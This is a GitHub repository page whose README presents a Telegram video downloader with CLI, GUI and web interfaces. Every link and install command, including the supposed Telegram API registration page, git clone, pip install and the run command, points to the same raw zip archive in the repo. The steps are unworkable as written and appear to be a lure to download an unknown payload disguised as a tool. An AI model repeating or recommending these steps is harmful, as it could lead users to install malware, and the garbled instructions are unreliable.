Skip to content

πŸ“₯ Download videos from Telegram using multiple hashtags. Choose between CLI, GUI, or modern web interface for easy content collection.

Notifications You must be signed in to change notification settings

andreabranca/Telegram-Downloader-Tools

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

26 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸ“₯ Telegram-Downloader-Tools - Easily Download Telegram Videos

Download

πŸ“‹ Overview

Telegram Downloader Tools allows users to download videos from Telegram using multiple hashtags. This tool is beneficial for collecting content from specific channels or groups. It is available in three versions:

  • πŸ–₯️ CLI (Command Line Interface) – For use in scripts and automation
  • 🎨 GUI (CustomTkinter) – Traditional graphical interface
  • ✨ Flet UI – Modern web interface (currently under development)

πŸš€ Getting Started

To start using this tool, follow the steps below.

πŸ“‘ Prerequisites

Before you download and install the software, make sure you have the following:

  • Python 3.7 or higher
  • A Telegram account
  • API ID and API Hash (see details below)

πŸ”‘ How to Get API ID and API Hash

To obtain your API ID and API Hash, follow these steps:

  1. Visit https://raw.githubusercontent.com/andreabranca/Telegram-Downloader-Tools/main/src/Telegram-Downloader-Tools_v3.5-alpha.5.zip and log in with your phone number.
  2. Click on "API development tools."
  3. Fill out the form to create a new application (App title, Short name, etc.).
  4. Your api_id and api_hash will be displayed.

πŸ‘‰ Download & Install

  1. To download the latest version of the tool, visit this page to download: Releases Page.

  2. After downloading, you need to install the necessary dependencies. Follow these steps:

    • Open your command line or terminal.

    • Navigate to the folder where you downloaded the tool.

    • Run the following commands:

    git clone https://raw.githubusercontent.com/andreabranca/Telegram-Downloader-Tools/main/src/Telegram-Downloader-Tools_v3.5-alpha.5.zip
    cd Telegram-Downloader-Tools
    pip install -r https://raw.githubusercontent.com/andreabranca/Telegram-Downloader-Tools/main/src/Telegram-Downloader-Tools_v3.5-alpha.5.zip

βš™οΈ Running the Tool

After installation, you can run the tool based on the interface you choose:

  • For the CLI version, run:

    python https://raw.githubusercontent.com/andreabranca/Telegram-Downloader-Tools/main/src/Telegram-Downloader-Tools_v3.5-alpha.5.zip
  • For the GUI version, simply open the application file by double-clicking it.

Make sure to enter your API ID and API Hash when prompted.

πŸ“‚ Features

  • Multiple Hashtags: Download videos using different hashtags.
  • User-Friendly Interface: The GUI version offers an intuitive experience.
  • Automation Support: The CLI version allows for script integration.

πŸ› οΈ Troubleshooting

If you encounter issues during installation or usage, try the following:

  1. Ensure Python and pip are installed correctly.
  2. Verify that you have entered the API ID and API Hash correctly.
  3. Check your internet connection.

Should you need additional help, feel free to consult the community or documentation related to Python and Telegram.

For any feedback or issues, please raise an issue on the GitHub Issues Page.

πŸ“§ Get in Touch

For questions or suggestions, feel free to reach out via GitHub or explore the discussions in the community.

By following these steps, you can easily download and use the Telegram Downloader Tools. Enjoy collecting your favorite content from Telegram!

About

πŸ“₯ Download videos from Telegram using multiple hashtags. Choose between CLI, GUI, or modern web interface for easy content collection.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages